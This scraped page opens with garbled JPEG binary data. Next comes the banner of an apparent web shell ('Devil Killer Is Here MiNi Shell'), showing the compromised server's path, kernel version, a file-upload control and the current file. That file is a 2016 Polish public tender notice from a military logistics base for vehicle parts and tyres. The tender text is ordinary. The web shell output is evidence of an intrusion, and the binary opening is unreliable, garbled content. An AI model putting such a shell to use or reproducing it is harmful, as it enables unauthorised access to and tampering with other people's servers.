JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160913/307623-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 307623 - 2016
              z dnia 2016-09-13 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Dostawa części zamiennych i ogumienia do pojazdów kołowych<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>2 Regionalna Baza Logistyczna, krajowy numer identyfikacyjny
              142665904, ul.
              Marsa 
              110,
              04-470 
              Warszawa, woj.
              mazowieckie, państwo
              , tel.
              261815214, e-mail
              2rblog.zampub@ron.mil.pl, faks
              261815093.
              <br />
              Adres strony internetowej (URL): www.2rblog.wp.mil.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Skarb Państwa, Jednostka Budżetowa - podsektor rządowy</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.2rblog.wp.mil.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.2rblog.wp.mil.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br />nie</div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />korespondencyjne, na adres: 2 RBLog, ul. Marsa 110, 04 - 470 Warszawa<br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br />ne</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa części zamiennych i ogumienia do pojazdów kołowych<br /><b>Numer referencyjny: </b>D/159/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest dostawa części zamiennych i ogumienia do pojazdów kołowych z podziałem na 5 części (zadań) z zastosowaniem prawa opcji.Wymagania oraz szczegółowy opis przedmiotu zamówienia wyszczególniono w załączniku nr 1 do SIWZ (Opis przedmiotu zamówienia). <br /><br /><b>II.5) Główny kod CPV: </b>34300000-0<br /><b> Dodatkowe kody CPV:</b>34352100-0<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              369865.00<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/11/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. aktualny odpisu z właściwego rejestru lub z centralnej ewidencji 
i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia;
2. informację w odniesieniu do przynależności do grupy kapitałowej:
2.1. Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji z otwarcia ofert, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
2.2. Zamawiający przedkłada w załączeniu wzór Informacji w odniesieniu do przynależności do grupy kapitałowej stanowiący  załącznik nr 4 do SIWZ.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. posiadania kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny;
2. posiadania sytuacji ekonomicznej lub finansowej  Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny;
3. posiadania zdolności technicznej lub zawodowej - Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny;
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">1. oświadczenie potwierdzające, że system zarządzania jakością Wykonawcy spełnia wymagania zawarte w AQAP 2130;
2. aktualną homologację (kopia, odpis itp.) wydaną na podstawie Regulaminu EKG ONZ nr 30 lub 54, w zależności wg jakiego z w/w regulaminów winno być homologowane dane ogumienie. Homologacja winna być w języku polskim lub przetłumaczona na język polski  dotyczy zadań 1  4;
3. oświadczenia  Wykonawcy potwierdzające spełnianie zgodności oferowanych dostaw z  wymaganiami określonymi przez Zamawiającego, które stanowi Załącznik nr 6 do SIWZ.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.Zamawiający żąda wniesienia wadium w łącznej wysokości 10 960,00 PLN (słownie: dziesięć tysięcy dziewięćset sześćdziesiąt  złotych) w tym na:
zadanie nr 1  2 400,00 PLN (słownie: dwa tysiące czterysta złotych);
zadanie nr 2    360,00 PLN (słownie: trzysta sześćdziesiąt złotych);
zadanie nr 3  2 200,00 PLN (słownie: dwa tysiące dwieście złotych);
zadanie nr 4  3 300,00 PLN (słownie: trzy tysiące trzysta złotych);
zadanie nr 5  2 700,00 PLN (słownie: dwa tysiące siedemset złotych).
Wykonawca składający ofertę na wybrane zadania dokonuje wpłaty wadium w wysokości wyszczególnionej dla poszczególnych części (zadań).
2. Wadium musi być wniesione przed upływem terminu składania ofert, wskazanym w Rozdziale XII SIWZ. 
3.Wykonawca zobowiązany jest wnieść wadium na cały okres związania ofertą, określony w Rozdziale X.
4.Zamawiający żąda wniesienia zabezpieczenia należytego wykonania umowy (dalej Zabezpieczenie), na pokrycie roszczeń z tytułu niewykonania lub nienależytego wykonania umowy.
2.Zabezpieczenie ustala się w wysokości 2 % ceny brutto podanej w ofercie.

</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji</td><td>20</td></tr><tr><td>Okres gwarancji</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Na podstawie art. 144 ustawy Pzp, zastrzega się możliwość dokonania zmian treści umowy w zakresie:
1)zmiany terminu wykonania umowy  gdy z powodu działania siły wyższej nie jest możliwe wykonanie przedmiotu umowy w umówionym terminie, bądź gdy niewykonanie umowy w terminie wyniknie z przyczyn leżących po stronie Zamawiającego lub użytkownika końcowego,
2)przedłużenia terminu wykonania umowy, o okres nie dłuższy niż okres trwania postępowania odwoławczego przed Krajową Izbą Odwoławczą oraz sądem powszechnym, w przypadku, gdy zostało wniesione odwołanie w postępowaniu o udzielenie zamówienia publicznego; 
3)zmiany wynagrodzenia  w przypadku zmiany przepisów prawnych (np. VAT), jeżeli wpływa ona na wysokość należnego wykonawcy wynagrodzenia - zgodnie ze zmienionymi przepisami; 
4)innych istotnych postanowień umowy -  gdy ich zmiana jest konieczna w związku ze zmianą przepisów prawa powszechnie obowiązującego, zmianą decyzji wydawanych przez Ministra Obrony Narodowej, bądź zmianą wytycznych przełożonych Zamawiającego,
5)zmiana określonego producenta, typu i modeli u przedmiotu umowy, w przypadku zakończenia jego produkcji lub wycofania go z produkcji, z tym że cena wskazana w § 2 umowy nie może ulec podwyższeniu, a parametry techniczne nie mogą być gorsze niż wskazane w załączniku do umowy.
2. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.
